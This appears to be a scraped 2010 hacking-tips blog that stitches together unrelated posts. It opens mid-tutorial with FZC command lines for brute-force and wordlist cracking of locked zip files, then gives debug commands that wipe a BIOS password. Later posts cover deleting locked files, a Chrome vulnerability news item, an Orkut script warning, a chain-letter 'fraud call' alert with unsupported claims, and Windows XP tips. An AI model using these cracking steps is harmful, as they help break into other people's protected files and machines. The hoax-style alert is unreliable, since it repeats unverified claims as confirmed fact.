Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait… and wait… and wait…and have good thoughts like “In wordlist mode I’m gonna get the password in minutes” or something like this… you start doing all this and remember “Hey this guy started with all this bullshit and didn’t say how I can start a wordlist attack!…” So please wait just a little more, read this tutorial ’till the end and you can do all this “bullshit”.

We need to keep in mind that are some people might choose some really weird passwords (for example: ‘e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won’t help you anymore. Instead, you’ll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won’t get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB’s list and start using the Brute Force attack.

If you have some sort of a really fast and new computer and you’re afraid that you won’t be able to use your computer’s power to the fullest because the zip cracker doesn’t support this kind of technology, it’s your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

Now that we’ve gone through all the theoretical stuff, let’s get to the actual commands.

Bruteforce

The command line you’ll need to use for using brute force is:

fzc -mb -nzFile.zip -lChr Lenght -cType of chars

Now if you read the bforce.txt that comes with fzc you’ll find the description of how works Chr Lenght and the Type of chars, but hey, I’m gonna explain this too. Why not, right?… (but remember look at the bforce.txt too)

For Chr Lenght you can use 4 kind of switches…

-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don’t think that you would do this…. if you are thinking in doing this get a live…
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option…

For the Type of chars we have 5 switches they are:

-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers

Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:

fzc -mb -nzTest.zip -l4-7 -ca1

This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

*****
hint
*****

You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn’t work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.

Wordlist

Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I’m not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I’m going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you’ll do something like.

fzc -mwMode number -nzFile.zip -nwWordlist

Where:

Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn’t in the same directory of FZC you’ll need to give the all path.

You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC would just start reading at line 50 and would just read with length >= to 9.

Example:

If you want to crack a file called myfile.zip using the “theargonlistserver1.txt” wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50

Resuming

Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:

fzc -mr

And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you’ll need to start a new wordlist attack, saying where it’s gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you’ll type

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.

Well, it looks like I covered most of what you need to know. I certainly hope it helped you… don’t forget to read the files that come with the program

Best way to Crack the BIOS password

2010-04-24T20:38:00.000-07:00

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.

Follow the steps below:

1) Boot up windows.
2) go to dos-prompt or go to command prompt
directly from the windows start up menu.

3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine

password protection gone!!!!!!!!!!!!!

EnjoYYYYYYYYYY

PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..

I have not found any other trouble if the codes are used.

To be on safe side, just back up your data……….

The use of this code is entirely at ur risk……….

It worked fine for me……….

Delete an “UnDeletable” File

2010-04-24T20:37:00.000-07:00

Hello Friends, this Tutorial is for all those who want to delete some files but they cannot delete them due to some reasons. Well this is a Full Proof way of deleting any Damn File. After Deleting the File in this way there won’t be any trace of that File on your computer.

Beware : Make sure that the file you are Deleting is not a System File.

1. Open a Command Prompt
window and leave it open.

2. Close all open programs.
3. Click Start, Run and enter TASKMGR.EXE
4. Go to the Processes tab and End Process on Explorer.exe.
5. Leave Task Manager open.
6. Go back to the Command Prompt window and change to the directory the AVI (or other undeletable
file) is located in.
7. At the command prompt type DEL where is the file you wish to delete.
8. Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
9. Close Task Manager.

Or

you can try this

1. Open Notepad.exe
2. Click File>Save As..>
3. Locate the folder where your undeletable file is
4. Choose ‘All files’ from the file type box
5. Click once on the file u wanna delete so its name appears in the ‘filename’ box
6. Put a ” at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)
7. Click save,
8. It should ask u to overwrite the existing file, choose yes and u can delete it as normal

Here’s a manual way of doing it. I’ll take this off once you put into your first post zain.

1. Start Run Type: command
2. To move into a directory type: cd c:\*** (The stars stand for your folder)
3. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
4. Once your in the folder the non-deletable file it in type in dir – a list will come up with everything inside.
5. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc… And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Google Chrome as a Hacking Tool

2010-04-24T20:36:00.000-07:00

This is not a joke. If you are using Google Chrome then it is very easy for a malicious attacker to get the Remote Access of your Computer.

Less than a week after the release of Google (NSDQ:GOOG)’s new Web browser Chrome, security researchers detected a buffer overflow vulnerability that could enable remote attackers to completely take control of a user’s computer.

The detected buffer overflow vulnerability, deemed critical by security experts, is the result of a boundary error in the handling of the “Save As” function. If a user saves a Web page
serving malicious content, the program could cause a stack-based overflow error, which could open the door for remote hackers to unleash malicious code on a user’s machine.

Remote attackers could then exploit the flaw by constructing a specially crafted Web page infused with malicious code. The attacker could then entice a victim to open and then save the infected page, which would subsequently download malicious code onto the victim’s computer and give the attacker complete access to the affected system.

Chrome’s latest buffer overflow vulnerability is one of about half a dozen errors detected in the newly released beta Web browser, about half of which allow for remote code execution, experts say. Another vulnerability, discovered shortly after the browser’s release Tuesday, included a carpetbombing glitch that stemmed from a fundamental flaw in the underlying user agent Safari 3.1.

However experts say that several Chrome beta version flaws are anticipated and will likely be worked out with the final version as the browser is subsequently tested.

“I think for a new product like Chrome, it doesn’t concern me much that they’re discovering the number of vulnerabilities and the details are getting out there. That’s the point of beta, especially open source beta,” said John Bambenek, handler for the SANS Internet Storm Center. “I think that the people who are really into getting exploits on a number of machines are not interested in messing with Chrome until (Google) gets some distribution out there.”

“If it’s not public information, the hackers don’t have it either,” he added.

And despite some errors that could lead to remote exploitation, experts say that because the browser is still in beta and not yet widely adopted, security threats for most users for the time being remains small.

“I don’t think the consumer impact is very large yet,” said Bambenek, “but that could change very quickly.”

Latest Orkut Hack

2010-04-24T20:34:00.000-07:00

Hello Friend,

I just wanted to warn you about a New Malicious Script that is running in Orkut
which changes your Profile Image.

The following is what Vandini, an Orkut Guide, wanted to share with you:

Hi Guys,

We are aware that some malicious scripts have spread in guise of event
notifications and have changed some profile photos. We are fixing such
affected profiles immediately. If you see something like ‘Title: src=”; height=”1″ width = “1″ on…” in an event invite email, please
ignore (or delete the email).

We apologize for any inconvenience and thank you for the cooperation
and patience.

I would advise you to follow the instructions given by Vandini and try to spread this message to more and more user so that they are not affected by Script

Security Alert: Fraud Calls

2010-04-24T20:33:00.003-07:00

Hello Friends,

If you receive a phone call on your Mobile from any person saying that they are checking your mobile line, and you have to press #90 or #09 or any other number. End this call immediately without pressing any numbers.

Friends there is a fraud company using a device that once you press #90 or #09 they can access your SIM card and make calls at your expense. Forward this message to as many friends as u can, to stop it. This information has been confirmed by both Motorola and Nokia. There are over 3 million affected mobile phones. You can check this news at CNN web site
also.

Security Alert: Fraud Calls

2010-04-24T20:33:00.001-07:00

19 Secrets about Windows XP

2010-04-24T20:31:00.003-07:00

You’ve read the reviews and digested the key feature enhancements and operational changes. Now it’s time to delve a bit deeper and uncover some of Windows XP’s secrets.

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type ’systeminfo’. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type ’systeminfo > info.txt’. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run… and type ‘gpedit.msc’; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care — some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter ‘rundll32.exe user32.dll,LockWorkStation’ in the location field. Give the shortcut a name you like. That’s it — just double click on it and your computer will be locked. And if that’s not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word ‘hide’ and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include ‘eventcreate’ and ‘eventtriggers’ for creating and watching system events, ‘typeperf’ for monitoring performance of various subsystems, and ’schtasks’ for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options — they’re all far too baroque to go into here.

6. XP has IP version 6 support — the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type ‘ipv6 install’ into Run… (it’s OK, it won’t ruin your existing network setup) and then ‘ipv6 /?’ at the command line to find out more. If you don’t know what IPv6 is, don’t worry and don’t bother.

7. You can at last get rid of tasks on the computer from the command line by using ‘taskkill /pid’ and the task number, or just ‘tskill’ and the process number. Find that out by typing ‘tasklist’, which will also tell you a lot about what’s going on in your system.

8. XP will treat Zip files like folders, which is nice if you’ve got a fast machine. On slower machines, you can make XP leave zip files well alone by typing ‘regsvr32 /u zipfldr.dll’ at the command line. If you change your mind later, you can put things back as they were by typing ‘regsvr32 zipfldr.dll’.

9. XP has ClearType — Microsoft’s anti-aliasing font display technology — but doesn’t have it enabled by default. It’s well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who’s using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum’s real IP address — they can find this out by going to http://www.whatismyip.com — and get them to make sure that they’ve got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As… and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run… from the start menu and type ‘control userpasswords2′, which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options… and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can’t see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You’ll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By… Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks — if it found the picture on the Internet when you copied the tracks from the CD. If it didn’t, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.